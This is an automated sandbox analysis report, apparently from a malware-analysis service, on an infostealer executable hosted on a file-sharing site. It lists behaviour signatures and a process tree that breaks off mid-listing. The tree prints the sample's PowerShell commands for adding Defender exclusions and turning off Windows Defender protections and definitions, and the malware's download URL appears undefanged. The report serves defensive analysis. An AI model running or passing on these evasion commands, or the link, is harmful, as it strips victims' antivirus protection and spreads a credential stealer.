hxxps://www[.]upload[.]ee/files/16357717/Built[.]exe[.]html

Analysis

max time kernel
1800s
max time network
1719s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
06-03-2024 10:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.upload.ee/files/16357717/Built.exe.html

Score

7^/10

spyware stealer upx

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
5800	Built.exe
5968	Built.exe
5548	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe
5968	Built.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023338-108.dat	upx
behavioral1/memory/5968-112-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp	upx
behavioral1/files/0x000700000002333c-115.dat	upx
behavioral1/files/0x000700000002332d-117.dat	upx
behavioral1/files/0x0007000000023336-119.dat	upx
behavioral1/memory/5968-121-0x00007FFED0260000-0x00007FFED0283000-memory.dmp	upx
behavioral1/memory/5968-123-0x00007FFEE1EF0000-0x00007FFEE1EFF000-memory.dmp	upx
behavioral1/memory/5968-116-0x00007FFEE1F00000-0x00007FFEE1F17000-memory.dmp	upx
behavioral1/files/0x0007000000023330-128.dat	upx
behavioral1/files/0x000700000002332c-131.dat	upx
behavioral1/memory/5968-130-0x00007FFECDF60000-0x00007FFECDF8D000-memory.dmp	upx
behavioral1/files/0x0007000000023333-135.dat	upx
behavioral1/files/0x000700000002333b-138.dat	upx
behavioral1/memory/5968-137-0x00007FFECDF30000-0x00007FFECDF53000-memory.dmp	upx
behavioral1/memory/5968-139-0x00007FFECDDB0000-0x00007FFECDF27000-memory.dmp	upx
behavioral1/memory/5968-134-0x00007FFEE1590000-0x00007FFEE15A9000-memory.dmp	upx
behavioral1/files/0x0007000000023332-140.dat	upx
behavioral1/memory/5968-142-0x00007FFED0500000-0x00007FFED0519000-memory.dmp	upx
behavioral1/files/0x000700000002333a-143.dat	upx
behavioral1/files/0x0007000000023335-148.dat	upx
behavioral1/files/0x0007000000023334-147.dat	upx
behavioral1/files/0x0007000000023337-149.dat	upx
behavioral1/memory/5968-145-0x00007FFEE1DD0000-0x00007FFEE1DDD000-memory.dmp	upx
behavioral1/files/0x0007000000023335-152.dat	upx
behavioral1/memory/5968-153-0x00007FFECDCC0000-0x00007FFECDD78000-memory.dmp	upx
behavioral1/files/0x0007000000023335-151.dat	upx
behavioral1/memory/5968-154-0x00007FFECD940000-0x00007FFECDCB8000-memory.dmp	upx
behavioral1/memory/5968-155-0x00007FFECDD80000-0x00007FFECDDAE000-memory.dmp	upx
behavioral1/files/0x000700000002332f-156.dat	upx
behavioral1/files/0x0007000000023331-158.dat	upx
behavioral1/files/0x000700000002333d-164.dat	upx
behavioral1/memory/5968-165-0x00007FFEE16D0000-0x00007FFEE16DD000-memory.dmp	upx
behavioral1/memory/5968-166-0x00007FFECD800000-0x00007FFECD91C000-memory.dmp	upx
behavioral1/memory/5968-168-0x00007FFECD920000-0x00007FFECD934000-memory.dmp	upx
behavioral1/memory/5968-167-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp	upx
behavioral1/memory/5968-170-0x00007FFEE1F00000-0x00007FFEE1F17000-memory.dmp	upx
behavioral1/memory/5968-175-0x00007FFED0260000-0x00007FFED0283000-memory.dmp	upx
behavioral1/memory/6472-316-0x000001B47E570000-0x000001B47E580000-memory.dmp	upx
behavioral1/memory/5968-315-0x00007FFECDF30000-0x00007FFECDF53000-memory.dmp	upx
behavioral1/memory/5968-401-0x00007FFECDDB0000-0x00007FFECDF27000-memory.dmp	upx
behavioral1/memory/5968-417-0x00007FFED0500000-0x00007FFED0519000-memory.dmp	upx
behavioral1/memory/5968-418-0x00007FFECDCC0000-0x00007FFECDD78000-memory.dmp	upx
behavioral1/memory/5968-430-0x00007FFECD940000-0x00007FFECDCB8000-memory.dmp	upx
behavioral1/memory/5968-435-0x00007FFECDD80000-0x00007FFECDDAE000-memory.dmp	upx
behavioral1/memory/5968-459-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp	upx
behavioral1/memory/5968-461-0x00007FFED0260000-0x00007FFED0283000-memory.dmp	upx
behavioral1/memory/5968-466-0x00007FFECDDB0000-0x00007FFECDF27000-memory.dmp	upx
behavioral1/memory/5968-528-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp	upx
behavioral1/memory/5968-575-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp	upx
behavioral1/memory/5968-607-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp	upx
behavioral1/memory/5968-608-0x00007FFEE1F00000-0x00007FFEE1F17000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
186	discord.com
187	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
177	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6676	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
5992	tasklist.exe
6384	tasklist.exe
5928	tasklist.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
6544	systeminfo.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
6112	taskkill.exe
6780	taskkill.exe
5908	taskkill.exe
6040	taskkill.exe
6508	taskkill.exe
5496	taskkill.exe
7032	taskkill.exe
5632	taskkill.exe
6776	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133541961080322743"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
6464	explorer.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
1224	chrome.exe
1224	chrome.exe
5564	powershell.exe
5564	powershell.exe
5732	powershell.exe
5732	powershell.exe
5556	powershell.exe
5556	powershell.exe
6472	powershell.exe
6472	powershell.exe
6364	powershell.exe
6364	powershell.exe
5556	powershell.exe
5564	powershell.exe
5564	powershell.exe
5732	powershell.exe
6364	powershell.exe
6472	powershell.exe
6960	powershell.exe
6960	powershell.exe
6960	powershell.exe
6472	powershell.exe
6472	powershell.exe
6472	powershell.exe
5348	chrome.exe
5348	chrome.exe
4272	powershell.exe
4272	powershell.exe
4272	powershell.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
5152	msedge.exe
5152	msedge.exe
7120	chrome.exe
7120	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeDebugPrivilege	5564	powershell.exe
Token: SeDebugPrivilege	5732	powershell.exe
Token: SeDebugPrivilege	5928	tasklist.exe
Token: SeDebugPrivilege	5992	tasklist.exe
Token: SeShutdownPrivilege	1224	chrome.exe
Token: SeCreatePagefilePrivilege	1224	chrome.exe
Token: SeDebugPrivilege	5556	powershell.exe
Token: SeIncreaseQuotaPrivilege	6344	WMIC.exe
Token: SeSecurityPrivilege	6344	WMIC.exe
Token: SeTakeOwnershipPrivilege	6344	WMIC.exe
Token: SeLoadDriverPrivilege	6344	WMIC.exe
Token: SeSystemProfilePrivilege	6344	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
1224	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe
5348	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1224 wrote to memory of 4212	1224	chrome.exe	88
PID 1224 wrote to memory of 4212	1224	chrome.exe	88
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4936	1224	chrome.exe	90
PID 1224 wrote to memory of 4836	1224	chrome.exe	91
PID 1224 wrote to memory of 4836	1224	chrome.exe	91
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92
PID 1224 wrote to memory of 2652	1224	chrome.exe	92

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.upload.ee/files/16357717/Built.exe.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffee1ae9758,0x7ffee1ae9768,0x7ffee1ae9778
  2⤵
  PID:4212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:2
  2⤵
  PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2168 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:2652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:1
  2⤵
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:1
  2⤵
  PID:2316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4460 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:1076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5128 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5504 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:1
  2⤵
  PID:2944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5788 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:64
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:4600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4460 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:4956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3844 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:1152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4628 --field-trial-handle=1812,i,12992836836707084673,59880024038970050,131072 /prefetch:8
  2⤵
  PID:5352

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1712

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5516

C:\Users\Admin\Downloads\Built.exe
"C:\Users\Admin\Downloads\Built.exe"
1⤵
- Executes dropped EXE
PID:5800
- C:\Users\Admin\Downloads\Built.exe
  "C:\Users\Admin\Downloads\Built.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Built.exe'"
    3⤵
    PID:3356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Built.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:5136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'"
    3⤵
    PID:5164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:764
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3104
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
